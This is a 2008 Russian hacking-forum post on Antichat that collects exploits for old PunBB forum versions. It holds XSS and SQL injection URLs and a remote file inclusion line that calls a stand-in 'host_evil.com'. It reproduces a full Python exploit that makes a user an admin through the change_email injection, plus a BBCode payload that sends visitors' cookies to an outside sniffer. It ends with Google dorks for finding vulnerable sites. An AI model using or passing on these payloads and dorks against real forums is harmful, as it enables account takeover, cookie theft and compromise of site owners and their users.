Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
[Обзор уязвимостей PunBB] |
20.01.2008, 04:28
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
[Обзор уязвимостей PunBB]
PunBB <= 1.2.14 Remote Code Execution Exploit
PunBB version <= 1.2.2 Authentication Bypass Exploit
ShAnKaR: multiple PHP application poison NULL byte vulnerability
PunBB 1.2.4 (change_email) SQL Injection Exploit
1.2.11
PHP код:
index.php&req_subject=test&req_message=test"><script>alert(1);</script>
<= 1.2.16(moderate.php)
PHP код:
preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', $_GET['get_host']))
moderate.php?get_host=1.1.1.1<script>alert(1)</script>
<= 1.2.16
PHP код:
moderate.php?get_host=1.1.1.1<script>alert(1)</script>
<= 1.2.15 (message_popup.php) XSS code vulnerability
PHP код:
<?php echo $lang_pms['Popup new'], $return['sender'], $lang_pms['Popup subj'], $return['subject'] ?><br><?php echo $lang_pms['Popup send'], format_time($return['posted']) ?>
<= 1.2.13 SQL Injection
PHP код:
search.php?action=search&keywords=hello&author=&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1&result_list[< UNION SQL QUERY >/*]&1763905137=1&1121320991=1
dork: warning: ini_get has been
Remote File Inclusion in forum PunBB 1.1.2 >> 1.1.5
PHP код:
include/common.php?pun_root=http://www.host_evil.com/cmd?&=id
PunBB <= 1.2.4 - change email to become admin exploit
Код:
#!/usr/bin/python
################################################## #####################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
################################################## #####################
# Proof of concept code from the Hardened-PHP Project
################################################## #####################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
################################################## #####################
import urllib
import getopt
import sys
import string
__argv__ = sys.argv
def banner():
print "PunBB 1.2.4 - change_email SQL injection exploit"
print "Copyright (C) 2005 Hardened-PHP Project\n"
def usage():
banner()
print "Usage:\n"
print " $ ./punbb_change_email.py [options]\n"
print " -h http_url url of the punBB forum to exploit"
print " f.e. http://www.forum.net/punBB/"
print " -u username punBB forum useraccount"
print " -p password punBB forum userpassword"
print " -e email email address where the admin leve activation email is sent"
print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails"
print ""
sys.exit(-1)
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
except getopt.GetoptError:
usage()
if len(__argv__) < 10:
usage()
username = None
password = None
email = None
domain = None
host = None
for o, arg in opts:
if o == "-h":
host = arg
if o == "-u":
username = arg
if o == "-p":
password = arg
if o == "-e":
email = arg
if o == "-d":
domain = arg
# Printout banner
banner()
# Check if everything we need is there
if host == None:
print "[-] need a host to connect to"
sys.exit(-1)
if username == None:
print "[-] username needed to continue"
sys.exit(-1)
if password == None:
print "[-] password needed to continue"
sys.exit(-1)
if email == None:
print "[-] email address needed to continue"
sys.exit(-1)
if domain == None:
print "[-] catch all domain needed to continue"
sys.exit(-1)
# Retrive cookie
params = {
'req_username' : username,
'req_password' : password,
'form_sent' : 1
}
wclient = urllib.URLopener()
print "[+] Connecting to retrieve cookie"
req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
info = req.info()
if 'set-cookie' not in info:
print "[-] Unable to retrieve cookie... something is wrong"
sys.exit(-3)
cookie = info['set-cookie']
cookie = cookie[:string.find(cookie, ';')]
print "[+] Cookie found - extracting user_id"
user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
print "[+] User-ID: %d" % (int(user_id))
wclient.addheader('Cookie', cookie);
email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
append = 'group_id=\'1'
email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
params = {
'req_new_email' : email,
'form_sent' : 1
}
print "[+] Connecting to request change email"
req = wclient.open(host + "profile.php?action=change_email&id=" + user_id,
urllib.urlencode(params))
print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
if __name__ == "__main__":
main()
PunBB BBCode URL Tag Script Injection Vulnerability
PHP код:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://baba/sniffer.php?c='+document.cookie;this.sss=null`styl e='font-size:0;][/url][/url]'[/color]
-punbb_users
--id
--group_id
--username
--password
Dork example:
intext:"Powered by PunBB 1.2.5"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7"
intext:"Powered by PunBB 1.1.0...7" OR "Powered by PunBB 1.2.0...7"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog -inurl:"page=info" -inurl:"page=all" -inurl:"showtopic"
intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog
Последний раз редактировалось ettee; 20.01.2008 в 04:40..
|
|
|
|
TEST QR: []
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид